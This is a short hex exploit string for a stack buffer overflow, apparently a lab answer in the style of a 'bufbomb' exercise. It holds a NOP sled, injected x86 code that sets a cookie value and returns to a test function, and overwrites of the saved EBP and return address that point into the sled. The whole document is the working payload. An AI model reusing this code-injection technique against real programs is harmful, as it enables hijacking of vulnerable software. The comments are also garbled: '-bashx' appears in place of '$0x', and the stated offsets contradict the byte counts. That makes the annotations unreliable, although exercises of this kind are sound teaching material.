/* Buffer padding (first 20 bytes) */
90 90 90 90 90 90 90 90  /* 8 bytes of NOPs */
90 90 90 90 90 90 90 90  /* 8 more bytes of NOPs */
90 90 90 90              /* 4 more bytes of NOPs */

/* Our exploit code (starts at byte 20) */
B8 36 2A A1 70           /* movl -bashx70a12a36, %eax - set cookie as return value */
8B 5C 24 04              /* movl 4(%esp), %ebx - restore original %ebx value */
                         /* This assumes we can find ebx's value on stack */
BD 60 33 68 55           /* movl -bashx55683360, %ebp - restore saved EBP */
68 93 8C 04 08           /* pushl -bashx8048c93 - push return address to test */
C3                       /* ret - return to test function */

/* Overwrite saved EBP (at offset 32) */
60 33 68 55              /* Original EBP value: 0x55683360 */

/* Overwrite saved EIP (at offset 36) with address in our NOP sled */
14 33 68 55              /* Point into our NOP sled (buffer + 12) */
